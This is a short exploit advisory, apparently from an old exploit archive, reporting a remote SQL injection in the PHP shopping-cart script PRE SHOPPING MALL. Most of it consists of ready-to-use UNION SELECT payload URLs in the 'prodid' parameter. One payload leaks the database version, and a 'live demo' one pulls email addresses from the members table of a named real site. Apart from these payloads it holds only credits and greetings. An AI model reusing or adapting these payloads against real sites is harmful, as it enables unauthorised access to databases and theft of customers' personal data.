PRE SHOPPING MALL[id]Remote SQL Injection Vulnerability
   --------------------------------------------------------------------------------


----------------------------------------------------------------
script : PRE SHOPPING MALL

script  :  http://www.preprojects.com/pclphp.asp

Risk : High

----------------------------------------------------------------

Dicovered by : d3b4g

email : bl4ckend[at]gmail[dot]com

Site. www.bl4ck3nd.info

----------------------------------------------------------------
Exploit : http://preproject.com/emall/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17+from+members/*

Live demo: http://preproject.com/emall/detail.php?prodid=-1+union+all+select+1,2,3,concat(email),5,6,7,8,9,10,11,12,13,14,15,16,17+from+members/*




----------------------------------------------------------------


----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
          
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================